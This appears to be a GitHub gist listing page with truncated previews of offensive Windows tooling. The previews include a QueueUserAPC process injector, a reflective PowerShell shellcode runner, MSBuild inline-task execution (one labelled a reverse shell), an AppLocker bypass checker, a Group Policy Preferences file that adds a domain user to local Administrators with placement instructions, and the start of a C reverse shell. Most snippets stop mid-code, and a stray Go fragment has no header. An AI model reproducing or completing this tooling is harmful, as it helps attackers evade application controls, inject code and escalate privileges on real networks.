braaaax / DInjectQueuerAPC.cs
Created September 21, 2021 16:18 — forked from rvrsh3ll/DInjectQueuerAPC.cs
.NET process injection into a freshly spawned process via QueueUserAPC, with the Win32 calls resolved through D/Invoke (dynamic invocation instead of static P/Invoke imports) - compatible with GadgetToJScript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
braaaax / workflow_compiler_helper.ps1
Created March 8, 2021 19:41
Generate a run.xml input file for Microsoft.Workflow.Compiler.exe: it loads the compiler assembly, calls the non-public CompilerWrapper.SerializeInputToWrapper via reflection, and serializes the WorkflowCompilerParameters plus the source path (C:\Users\Public\test.txt) that the compiler will later build and run.
$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper',[Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "C:\Users\Public\test.txt"
$output = "run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null,@([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam,[String[]] @(,$pathvar)))
braaaax / substitute.ps1
Created March 8, 2021 19:39
String obfuscation: each character of $payload is shifted by +17 on its byte value and emitted as a zero-padded fixed-width decimal so the result can be reversed character by character.
$payload = "hi mom"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 17
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
braaaax / run.ps1
Last active March 8, 2021 20:14
PowerShell shellcode runner: resolves Win32 API addresses by reflecting into the non-public Microsoft.Win32.UnsafeNativeMethods type of the GAC-loaded System.dll (GetModuleHandle/GetProcAddress) instead of declaring P/Invoke signatures with Add-Type.
function LookupFunc {
    <#
    .SYNOPSIS
    Resolves the address of an exported native function without declaring any P/Invoke signature.
    .DESCRIPTION
    Finds the GAC-loaded System.dll in the current AppDomain, reaches into its non-public
    Microsoft.Win32.UnsafeNativeMethods type, and invokes its GetModuleHandle and
    GetProcAddress wrappers by reflection, so no Add-Type/DllImport declaration is compiled.
    .PARAMETER moduleName
    Name of a module already loaded in the process (e.g. kernel32.dll).
    .PARAMETER functionName
    Name of the export to resolve inside that module.
    .OUTPUTS
    Whatever UnsafeNativeMethods.GetProcAddress returns for the export.
    #>
    Param ($moduleName, $functionName)

    # Locate System.dll by the file name of the assembly's on-disk location.
    $systemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $nativeMethods = $systemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')

    # GetProcAddress has several overloads; take the first one GetMethods() yields.
    $getProcAddress = @($nativeMethods.GetMethods() | Where-Object { $_.Name -eq "GetProcAddress" })[0]
    $moduleHandle = $nativeMethods.GetMethod('GetModuleHandle').Invoke($null, @($moduleName))

    return $getProcAddress.Invoke($null, @($moduleHandle, $functionName))
}
function getDelegateType {
Param (
braaaax / brax.csproj
Created March 8, 2021 18:10
MSBuild project with an inline C# task (CodeTaskFactory in Microsoft.Build.Tasks.v4.0.dll); the code runs inside msbuild.exe when the project is built.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="0xtaco">
<Brax />
</Target>
<UsingTask
TaskName="Brax"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
package main
import (
"bufio"
"bytes"
braaaax / Applocker-bypass-checker.ps1
Created March 17, 2019 18:30
AppLocker Bypass Checker
# AppLocker Bypass Checker (Default Rules) v2.0
#
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed.
# A normal user shouldn't have write permission under that folder, but in practice some subdirectories are writable, and that is what this script looks for.
# It lists ACL entries for the "BUILTIN\Users" group that grant Write/CreateFiles together with Execute rights: a directory allowing both lets a user drop and run a binary that the default AppLocker path rule permits.
#
# @Author: Sparc Flow in "How to Hack a Fashion Brand"
#
# NOTE: change the group and root_folder variables to suit your needs
braaaax / csrev.xml
Created March 12, 2019 21:46
MSBuild inline C# reverse shell (CodeTaskFactory task executed by msbuild.exe when the project is built)
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
braaaax / gpo abuse
Created March 8, 2019 11:25 — forked from chryzsh/gpo abuse
Group Policy Preferences Groups.xml that adds a domain user to the local Administrators and Remote Desktop Users groups. Place it at \\<domain>\SYSVOL\<domain>\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml (you need write access to that GPO's folder), and replace the lab\chry name and SID in both Member elements with the target account.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32
   (the #pragma comment(lib, ...) below is an MSVC-only directive that mingw ignores, and it names "w2_32"
   rather than ws2_32, so the explicit -lws2_32 flag is what actually links Winsock) */
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "w2_32")
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;